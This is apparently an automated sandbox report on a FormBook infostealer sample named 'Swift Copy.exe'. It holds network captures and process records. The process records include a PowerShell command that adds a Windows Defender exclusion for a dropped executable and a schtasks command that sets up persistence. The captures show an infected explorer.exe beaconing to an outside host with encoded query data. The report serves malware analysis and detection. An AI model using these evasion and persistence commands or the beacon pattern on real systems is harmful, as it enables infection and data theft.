Aug 11, 2022 06:30:10.063811064 CEST	11876	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:30:09 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 37 2f 63 72 6f 70 70 65 64 2d 57 68 61 74 73 41 70 70 2d 49 6d 61 67 65 2d 32 30 32 32 2d 30 37 2d 32 35 2d 61 74 2d 31 31 2e 30 30 2e 31 36 2d 41 4d 2e 6a 70 65 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d Data Ascii: 3e30<!DOCTYPE html><html lang="en-US" class="no-js no-svg"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - MOGDENTO</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - MOGDENTO" /><meta property="og:site_name" content="MOGDENTO" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://mogdento.com/#organization","name":"MOGDENTO","url":"https://mogdento.com/","sameAs":[],"logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://mogdento.com/#/schema/logo/image/","url":"https://mogdento.com/wp-content/uploads/2022/07/cropped-WhatsApp-Image-2022-07-25-at-11.00.16-AM.jpeg","contentUrl":"https://mogdento.com
Aug 11, 2022 06:30:10.063870907 CEST	11877	IN	Data Raw: 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 37 2f 63 72 6f 70 70 65 64 2d 57 68 61 74 73 41 70 70 2d 49 6d 61 67 65 2d 32 30 32 32 2d 30 37 2d 32 35 2d 61 74 2d 31 31 2e 30 30 2e 31 36 2d 41 4d 2e 6a 70 65 67 22 Data Ascii: /wp-content/uploads/2022/07/cropped-WhatsApp-Image-2022-07-25-at-11.00.16-AM.jpeg","width":250,"height":250,"caption":"MOGDENTO"},"image":{"@id":"https://mogdento.com/#/schema/logo/image/"}},{"@type":"WebSite","@id":"https://mogdento.com/#webs
Aug 11, 2022 06:30:10.063914061 CEST	11878	IN	Data Raw: 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 Data Ascii: ":".svg","source":{"concatemoji":"http:\/\/mogdento.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.1"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");functi
Aug 11, 2022 06:30:10.063992023 CEST	11880	IN	Data Raw: 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d Data Ascii: &(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everythin
Aug 11, 2022 06:30:10.064032078 CEST	11881	IN	Data Raw: 6c 6f 63 6b 2d 63 6f 64 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 Data Ascii: lock-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100
Aug 11, 2022 06:30:10.064073086 CEST	11882	IN	Data Raw: 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a Data Ascii: as-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-s
Aug 11, 2022 06:30:10.064121962 CEST	11884	IN	Data Raw: 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 70 61 63 6b 61 67 65 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 62 6c 6f 63 6b 73 2f 62 75 69 6c 64 2f 77 63 2d 62 6c 6f 63 6b 73 2d 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 37 2e 38 2e 33 27 20 74 79 Data Ascii: ns/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=7.8.3' type='text/css' media='all' /><style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray
Aug 11, 2022 06:30:10.064208984 CEST	11885	IN	Data Raw: 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 Data Ascii: );--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linea
Aug 11, 2022 06:30:10.064254045 CEST	11887	IN	Data Raw: 65 6e 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 62 6c 75 65 2d 6f 72 61 6e 67 65 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 62 6c 75 65 2d 6f 72 61 6e 67 65 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: en');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{co
Aug 11, 2022 06:30:10.064316034 CEST	11888	IN	Data Raw: 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d Data Ascii: uish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var
Aug 11, 2022 06:30:10.252357960 CEST	11889	IN	Data Raw: 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f Data Ascii: ish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--w

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49828	103.92.235.55	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:30:11.325797081 CEST	11911	OUT	GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1 Host: www.mogdento.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 11, 2022 06:30:12.432917118 CEST	11911	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 11 Aug 2022 04:30:11 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Swift Copy.exePID: 1740, Parent PID: 3236

General

Target ID:	0
Start time:	06:28:04
Start date:	11/08/2022
Path:	C:\Users\user\Desktop\Swift Copy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Swift Copy.exe"
Imagebase:	0x30000
File size:	951808 bytes
MD5 hash:	50D4FB3F5A33007C2F80E5BBAA5E0CCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2300, Parent PID: 1740

General

Target ID:	4
Start time:	06:28:17
Start date:	11/08/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Imagebase:	0xb70000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2292, Parent PID: 2300

General

Target ID:	5
Start time:	06:28:17
Start date:	11/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5924, Parent PID: 1740

General

Target ID:	6
Start time:	06:28:17
Start date:	11/08/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Imagebase:	0xc30000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1164, Parent PID: 5924

General

Target ID:	7
Start time:	06:28:21
Start date:	11/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 4200, Parent PID: 1740

General

Target ID:	8
Start time:	06:28:23
Start date:	11/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xe50000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3968, Parent PID: 4200

General

Target ID:	11
Start time:	06:28:27
Start date:	11/08/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6b8cf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: autofmt.exePID: 1164, Parent PID: 3968

General

Target ID:	24
Start time:	06:28:57
Start date:	11/08/2022
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0xe0000
File size:	831488 bytes
MD5 hash:	7FC345F685C2A58283872D851316ACC4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: NETSTAT.EXEPID: 5496, Parent PID: 3968

General

Target ID:	25
Start time:	06:28:57
Start date:	11/08/2022
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x370000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Swift Copy.exePID: 1740, Parent PID: 3236COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.6%
Total number of Nodes:	156
Total number of Limit Nodes:	8

Executed Functions

Function 049CAB82 Relevance: 48.9, Strings: 36, Instructions: 3864
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$%k, xrefs: 049CC3BD
$%k, xrefs: 049CE2B3
$%k, xrefs: 049CBEAB
$%k, xrefs: 049CCCC3
,, xrefs: 049CC6F4
$%k, xrefs: 049CC497
$%k, xrefs: 049CBA57
$%k, xrefs: 049CCF5D
$%k, xrefs: 049CC0A0
$%k, xrefs: 049CDF4B
$%k, xrefs: 049CEBA8
$%k, xrefs: 049CE62F
', xrefs: 049CBF7A
$%k, xrefs: 049CBC0B
$%k, xrefs: 049CE4AD
$%k, xrefs: 049CED43
$%k, xrefs: 049CEAC2
$%k, xrefs: 049CC7F8
$%k, xrefs: 049CE819
$%k, xrefs: 049CC1A8
$%k, xrefs: 049CC571
$%k, xrefs: 049CBB31
$%k, xrefs: 049CE0C9
$%k, xrefs: 049CCE77
k, xrefs: 049CB9F7
$%k, xrefs: 049CCD9D
$%k, xrefs: 049CC8D2
$%k, xrefs: 049CDBC0
$%k, xrefs: 049CBCF7
$%k, xrefs: 049CB884
$%k, xrefs: 049CD055
8, xrefs: 049CB5AD
$%k, xrefs: 049CB6C3
$%k, xrefs: 049CBDD1
k, xrefs: 049CBAD1
?, xrefs: 049CC2B9

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID:
String ID: $%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$'$,$8$?$k$k
API String ID: 0-3622033959
Opcode ID: c7095382f1fa3a5a3c622c456bbb356d4eea3897f0c3990e24633eff7606ee44
Instruction ID: 7b7ee7cced810b0fdb8f1051463612a198c981e4a6437ea6b3c1f736e06bc31b
Opcode Fuzzy Hash: c7095382f1fa3a5a3c622c456bbb356d4eea3897f0c3990e24633eff7606ee44
Instruction Fuzzy Hash: BC93D374A006188FDB65EF38C854AD9B7F2BF89304F5085ADD44AAB360DB35AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 049CAB90 Relevance: 48.9, Strings: 36, Instructions: 3861
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$%k, xrefs: 049CC3BD
$%k, xrefs: 049CE2B3
$%k, xrefs: 049CBEAB
$%k, xrefs: 049CCCC3
,, xrefs: 049CC6F4
$%k, xrefs: 049CC497
$%k, xrefs: 049CBA57
$%k, xrefs: 049CCF5D
$%k, xrefs: 049CC0A0
$%k, xrefs: 049CDF4B
$%k, xrefs: 049CEBA8
$%k, xrefs: 049CE62F
', xrefs: 049CBF7A
$%k, xrefs: 049CBC0B
$%k, xrefs: 049CE4AD
$%k, xrefs: 049CED43
$%k, xrefs: 049CEAC2
$%k, xrefs: 049CC7F8
$%k, xrefs: 049CE819
$%k, xrefs: 049CC1A8
$%k, xrefs: 049CC571
$%k, xrefs: 049CBB31
$%k, xrefs: 049CE0C9
$%k, xrefs: 049CCE77
k, xrefs: 049CB9F7
$%k, xrefs: 049CCD9D
$%k, xrefs: 049CC8D2
$%k, xrefs: 049CDBC0
$%k, xrefs: 049CBCF7
$%k, xrefs: 049CB884
$%k, xrefs: 049CD055
8, xrefs: 049CB5AD
$%k, xrefs: 049CB6C3
$%k, xrefs: 049CBDD1
k, xrefs: 049CBAD1
?, xrefs: 049CC2B9

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID:
String ID: $%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$$%k$'$,$8$?$k$k
API String ID: 0-3622033959
Opcode ID: edd1f3018ccabce3a362409074c766008969db91f9263578572061e08da6d166
Instruction ID: 3c9a623c233a1b17efd669c799ac6ce066eea4e37062ca4ffd01cb69bf4e98a0
Opcode Fuzzy Hash: edd1f3018ccabce3a362409074c766008969db91f9263578572061e08da6d166
Instruction Fuzzy Hash: DA93D374A006188FDB65EF38C854AD9B7F2BF89304F5085ADD44AAB360DB35AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 02337330 Relevance: 3.5, Strings: 2, Instructions: 972
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

